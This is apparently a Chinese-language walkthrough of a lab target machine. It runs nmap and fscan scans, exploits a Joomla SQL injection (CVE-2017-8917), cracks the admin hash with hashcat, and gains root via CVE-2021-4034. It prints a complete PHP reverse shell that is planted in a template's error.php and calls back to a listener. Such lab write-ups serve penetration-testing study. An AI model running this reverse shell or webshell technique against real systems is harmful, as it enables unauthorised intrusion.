author：leadlife

data：2023/5/15

blog：Tripse Blog

本次测试使用到的工具如下：

• 信息收集：nmap、fscan、cmseek、searchsploit

• hash识别：hashid

• 暴力破解：hashcat

• 内部信息收集：无

• 权限提升：无

外部信息收集

Nmap ICMP 扫描发现主机

其中 IP：10.10.10.130 为 靶机 IP

 sudo nmap -sP 10.10.10.0/24 -T4 --min-rate 10000

 Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-15 18:08 CST
 Nmap scan report for 10.10.10.130
 Host is up (0.000092s latency).
 MAC Address: 08:00:27:81:03:54 (Oracle VirtualBox virtual NIC)
 Nmap scan report for 10.10.10.254
 Host is up (0.00026s latency).
 MAC Address: 00:50:56:FC:DC:5C (VMware)
 Nmap scan report for 10.10.10.1
 Host is up.
 Nmap done: 256 IP addresses (3 hosts up) scanned in 0.35 seconds

Fsacn 探测开放端口

发现仅开放 80 端口

 sudo fscan -h 10.10.10.130 -t 30 -p 0-65535

    ___                              _
   / _      ___  ___ _ __ __ _  ___| | __
  / /_/____/ __|/ __| '__/ _` |/ __| |/ /
 / /_\_____\__  (__| | | (_| | (__|   <
 \____/     |___/\___|_|  \__,_|\___|_|\_
                      fscan version: 1.8.1
 start infoscan
 (icmp) Target 10.10.10.130    is alive
 [*] Icmp alive hosts len is: 1
 10.10.10.130:80 open
 [*] alive ports len is: 1
 start vulscan
 [*] WebTitle: http://10.10.10.130       code:200 len:7082   title:Home
 [+] http://10.10.10.130 poc-yaml-joomla-cve-2017-8917-sqli
 已完成 1/1
 [*] 扫描结束,耗时: 3.732715478s⏎

Nmap 进行详细端口扫描

• 为避免某些端口的疏忽，这里再用 nmap 进行一次扫描

• 发现提示 WEB 为 Joomla

 sudo nmap -sS -sV -sC -T4 --min-rate 10000 -O -oN nmap.all 10.10.10.130 -p0-65535

 Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-15 18:11 CST
 Nmap scan report for 10.10.10.130
 Host is up (0.00026s latency).
 Not shown: 65535 closed tcp ports (reset)
 PORT   STATE SERVICE VERSION
 80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
 |_http-title: Home
 |_http-generator: Joomla! - Open Source Content Management
 |_http-server-header: Apache/2.4.18 (Ubuntu)
 MAC Address: 08:00:27:81:03:54 (Oracle VirtualBox virtual NIC)
 Device type: general purpose
 Running: Linux 3.X|4.X
 OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
 OS details: Linux 3.2 - 4.9
 Network Distance: 1 hop
 ​
 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 9.38 seconds

判断 CMS

访问 Web 页面验证是否为 Jommla

CMSeek 判断 CMS 版本

searchsploit 搜寻 cms 版本漏洞

可以判定很可能存在 SQL 注入，那么下面思路如下：

• 通过 SQL 注入拿到数据库中后台的管理员密码

• 后台获取 SHELL

获取 SHELL

利用漏洞

先查看漏洞的说明

这里用 PHP 起一个 HTTP 服务利用该脚本进行测试

访问本地 127.0.0.1:1234 利用如下：

识别 Hash

破解 Hash

利用到 hashcat

密码字典：seclists：/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt

  hashcat -a 0 -m 3200 hash.txt /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt

得到密码：snoopy

登入后台 Getshell

来到后台：http://10.10.10.130/administrator/index.php

这里利用到 php-reverse-shell.php，内容如下：

注意修改 IP 和端口用于 nc 监听

 <?php
 ​
 set_time_limit (0);
 $VERSION = "1.0";
 $ip = '10.10.10.1';  // CHANGE THIS
 $port = 1234;       // CHANGE THIS
 $chunk_size = 1400;
 $write_a = null;
 $error_a = null;
 $shell = 'uname -a; w; id; /bin/sh -i';
 $daemon = 0;
 $debug = 0;
 ​
 //
 // Daemonise ourself if possible to avoid zombies later
 //
 ​
 // pcntl_fork is hardly ever available, but will allow us to daemonise
 // our php process and avoid zombies.  Worth a try...
 if (function_exists('pcntl_fork')) {
     // Fork and have the parent process exit
     $pid = pcntl_fork();
     
     if ($pid == -1) {
         printit("ERROR: Can't fork");
         exit(1);
     }
     
     if ($pid) {
         exit(0);  // Parent exits
     }
 ​
     // Make the current process a session leader
     // Will only succeed if we forked
     if (posix_setsid() == -1) {
         printit("Error: Can't setsid()");
         exit(1);
     }
 ​
     $daemon = 1;
 } else {
     printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
 }
 ​
 // Change to a safe directory
 chdir("/");
 ​
 // Remove any umask we inherited
 umask(0);
 ​
 //
 // Do the reverse shell...
 //
 ​
 // Open reverse connection
 $sock = fsockopen($ip, $port, $errno, $errstr, 30);
 if (!$sock) {
     printit("$errstr ($errno)");
     exit(1);
 }
 ​
 // Spawn shell process
 $descriptorspec = array(
    0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
    1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
    2 => array("pipe", "w")   // stderr is a pipe that the child will write to
 );
 ​
 $process = proc_open($shell, $descriptorspec, $pipes);
 ​
 if (!is_resource($process)) {
     printit("ERROR: Can't spawn shell");
     exit(1);
 }
 ​
 // Set everything to non-blocking
 // Reason: Occsionally reads will block, even though stream_select tells us they won't
 stream_set_blocking($pipes[0], 0);
 stream_set_blocking($pipes[1], 0);
 stream_set_blocking($pipes[2], 0);
 stream_set_blocking($sock, 0);
 ​
 printit("Successfully opened reverse shell to $ip:$port");
 ​
 while (1) {
     // Check for end of TCP connection
     if (feof($sock)) {
         printit("ERROR: Shell connection terminated");
         break;
     }
 ​
     // Check for end of STDOUT
     if (feof($pipes[1])) {
         printit("ERROR: Shell process terminated");
         break;
     }
 ​
     // Wait until a command is end down $sock, or some
     // command output is available on STDOUT or STDERR
     $read_a = array($sock, $pipes[1], $pipes[2]);
     $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
 ​
     // If we can read from the TCP socket, send
     // data to process's STDIN
     if (in_array($sock, $read_a)) {
         if ($debug) printit("SOCK READ");
         $input = fread($sock, $chunk_size);
         if ($debug) printit("SOCK: $input");
         fwrite($pipes[0], $input);
     }
 ​
     // If we can read from the process's STDOUT
     // send data down tcp connection
     if (in_array($pipes[1], $read_a)) {
         if ($debug) printit("STDOUT READ");
         $input = fread($pipes[1], $chunk_size);
         if ($debug) printit("STDOUT: $input");
         fwrite($sock, $input);
     }
 ​
     // If we can read from the process's STDERR
     // send data down tcp connection
     if (in_array($pipes[2], $read_a)) {
         if ($debug) printit("STDERR READ");
         $input = fread($pipes[2], $chunk_size);
         if ($debug) printit("STDERR: $input");
         fwrite($sock, $input);
     }
 }
 ​
 fclose($sock);
 fclose($pipes[0]);
 fclose($pipes[1]);
 fclose($pipes[2]);
 proc_close($process);
 ​
 // Like print, but does nothing if we've daemonised ourself
 // (I can't figure out how to redirect STDOUT like a proper daemon)
 function printit ($string) {
     if (!$daemon) {
         print "$string
";
     }
 }
 ​
 ?> 

操作步骤如下：

将源 error.php 代码删除，复制粘贴 php-reverse-shell.php 内容进去

本地启用监听：

 nc -lvnp 1234

访问：http://10.10.10.130/templates/beez3/error.php

即可获得回弹 SHELL

内部信息收集

优化 SHELL

• 操作 TTY SHELL ：python -c 'import pty;pty.spawn("/bin/bash")'

• 操作环境变量：export TERM=xterm

内核与发行版

SUID

操作 SUID 时发现了该程序，可直接用 CVE-2021-4034 本地提权

SUDO

无 sudo 位

权限提升

先本地用 Python 起一个 Web 用于传输文件

编译，提权

End Flag